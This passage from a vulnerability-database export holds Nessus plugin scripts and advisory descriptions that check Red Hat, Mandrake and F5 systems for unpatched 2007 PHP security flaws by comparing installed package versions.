value:\"p-cpe:/a:redhat:enterprise_linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/05/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0153\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-bcmath-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-bcmath-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-bcmath-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-cli-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-cli-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-cli-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-common-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-common-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-common-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-dba-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-dba-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-dba-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-devel-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-devel-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-devel-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-gd-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-gd-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-gd-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-imap-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-imap-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-imap-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ldap-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ldap-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ldap-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mbstring-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mbstring-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mbstring-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mysql-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mysql-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mysql-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ncurses-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ncurses-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ncurses-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-odbc-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-odbc-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-odbc-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pdo-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pdo-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pdo-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pgsql-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pgsql-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pgsql-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-snmp-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-snmp-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-snmp-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-soap-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-soap-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-soap-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xml-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xml-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xml-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xmlrpc-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xmlrpc-5.1.6-11.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xmlrpc-5.1.6-11.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-devel / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2019-01-16T20:09:08", "bulletinFamily": "scanner", "description": "A heap-based buffer overflow vulnerability was found in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution\n(CVE-2007-1001).\n\nA DoS flaw was found in how PHP processed a deeply nested array. A\nremote attacker could cause the PHP intrerpreter to creash by\nsubmitting an input variable with a deeply nested array\n(CVE-2007-1285).\n\nThe internal filter module in PHP in certain instances did not\nproperly strip HTML tags, which allowed a remote attacker conduct\ncross-site scripting (XSS) attacks (CVE-2007-1454).\n\nA vulnerability in the way the mbstring extension set global variables\nwas discovered where a script using the mb_parse_str() function to set\nglobal variables could be forced to to enable the register_globals\nconfiguration option, possibly resulting in global variable injection\n(CVE-2007-1583).\n\nA vulnerability in how PHP's mail() function processed header data was\ndiscovered. If a script sent mail using a subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\nemail to unintended recipients (CVE-2007-1718).\n\nUpdated packages have been patched to correct these issues. Also note\nthat the default use of Suhosin helped to protect against some of\nthese issues prior to patching.", "modified": "2018-12-05T00:00:00", "published": "2009-04-23T00:00:00", "id": "MANDRAKE_MDKSA-2007-090.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=37164", "title": "Mandrake Linux Security Advisory : php (MDKSA-2007:090)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2007:090. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(37164);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2018/12/05 20:31:23\");\n\n script_cve_id(\"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1454\", \"CVE-2007-1583\", \"CVE-2007-1718\");\n script_bugtraq_id(22764, 22914, 23016, 23145, 23357);\n script_xref(name:\"MDKSA\", value:\"2007:090\");\n\n script_name(english:\"Mandrake Linux Security Advisory : php (MDKSA-2007:090)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap-based buffer overflow vulnerability was found in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution\n(CVE-2007-1001).\n\nA DoS flaw was found in how PHP processed a deeply nested array. A\nremote attacker could cause the PHP intrerpreter to creash by\nsubmitting an input variable with a deeply nested array\n(CVE-2007-1285).\n\nThe internal filter module in PHP in certain instances did not\nproperly strip HTML tags, which allowed a remote attacker conduct\ncross-site scripting (XSS) attacks (CVE-2007-1454).\n\nA vulnerability in the way the mbstring extension set global variables\nwas discovered where a script using the mb_parse_str() function to set\nglobal variables could be forced to to enable the register_globals\nconfiguration option, possibly resulting in global variable injection\n(CVE-2007-1583).\n\nA vulnerability in how PHP's mail() function processed header data was\ndiscovered. If a script sent mail using a subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\nemail to unintended recipients (CVE-2007-1718).\n\nUpdated packages have been patched to correct these issues. Also note\nthat the default use of Suhosin helped to protect against some of\nthese issues prior to patching.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.2.1-4.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", cpu:\"i386\", reference:\"libphp5_common5-5.2.1-4.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-cgi-5.2.1-4.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-cli-5.2.1-4.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-devel-5.2.1-4.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-fcgi-5.2.1-4.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-filter-5.2.1-0.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-gd-5.2.1-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-mbstring-5.2.1-1.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-openssl-5.2.1-4.1mdv2007.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.1\", reference:\"php-zlib-5.2.1-4.1mdv2007.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2019-01-16T20:07:16", "bulletinFamily": "scanner", "description": "Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 2.1.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA denial of service flaw was found in the way PHP processed a deeply\nnested array. A remote attacker could cause the PHP interpreter to\ncrash by submitting an input variable with a deeply nested array.\n(CVE-2007-1285)\n\nA flaw was found in the way PHP's unserialize() function processes\ndata. If a remote attacker is able to pass arbitrary data to PHP's\nunserialize() function, it may be possible for them to execute\narbitrary code as the apache user. (CVE-2007-1286)\n\nA double free flaw was found in PHP's session_decode() function. If a\nremote attacker is able to pass arbitrary data to PHP's\nsession_decode() function, it may be possible for them to execute\narbitrary code as the apache user. (CVE-2007-1711)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.", "modified": "2018-11-16T00:00:00", "published": "2007-04-19T00:00:00", "id": "REDHAT-RHSA-2007-0154.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=25067", "title": "RHEL 2.1 : php (RHSA-2007:0154)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0154. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25067);\n script_version (\"1.22\");\n script_cvs_date(\"Date: 2018/11/16 15:19:26\");\n\n script_cve_id(\"CVE-2007-1285\", \"CVE-2007-1286\", \"CVE-2007-1711\");\n script_bugtraq_id(22764, 22765);\n script_xref(name:\"RHSA\", value:\"2007:0154\");\n\n script_name(english:\"RHEL 2.1 : php (RHSA-2007:0154)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 2.1.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA denial of service flaw was found in the way PHP processed a deeply\nnested array. A remote attacker could cause the PHP interpreter to\ncrash by submitting an input variable with a deeply nested array.\n(CVE-2007-1285)\n\nA flaw was found in the way PHP's unserialize() function processes\ndata. If a remote attacker is able to pass arbitrary data to PHP's\nunserialize() function, it may be possible for them to execute\narbitrary code as the apache user. (CVE-2007-1286)\n\nA double free flaw was found in PHP's session_decode() function. If a\nremote attacker is able to pass arbitrary data to PHP's\nsession_decode() function, it may be possible for them to execute\narbitrary code as the apache user. (CVE-2007-1711)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1285\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1711\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:0154\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0154\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-4.1.2-2.17\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-devel-4.1.2-2.17\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-imap-4.1.2-2.17\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-ldap-4.1.2-2.17\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-manual-4.1.2-2.17\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-mysql-4.1.2-2.17\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-odbc-4.1.2-2.17\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-pgsql-4.1.2-2.17\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-imap / php-ldap / php-manual / php-mysql / etc\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:19:50", "bulletinFamily": "scanner", "description": "The remote BIG-IP device is missing a patch required by a security\nadvisory.", "modified": "2019-01-04T00:00:00", "published": "2014-10-10T00:00:00", "id": "F5_BIGIP_SOL7859.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78215", "title": "F5 Networks BIG-IP : Multiple PHP vulnerabilities (SOL7859)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL7859.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78215);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2007-0455\", \"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1286\", \"CVE-2007-1583\", \"CVE-2007-1711\", \"CVE-2007-1718\", \"CVE-2007-1846\", \"CVE-2007-1864\", \"CVE-2007-2509\");\n script_bugtraq_id(22764, 22765, 23016, 23145, 23212, 23357, 23813, 23818);\n\n script_name(english:\"F5 Networks BIG-IP : Multiple PHP vulnerabilities (SOL7859)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security 